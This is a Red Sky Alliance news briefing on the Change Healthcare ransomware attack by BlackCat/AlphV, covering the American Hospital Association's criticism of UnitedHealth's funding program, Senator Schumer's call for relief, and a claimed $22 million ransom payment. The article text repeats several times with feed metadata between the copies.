<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation.”</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www.redskyalliance.org/</li>
<li>Website: https://www.redskyalliance.com/</li>
<li>LinkedIn: https://www.linkedin.com/company/64265941</li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation.”</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
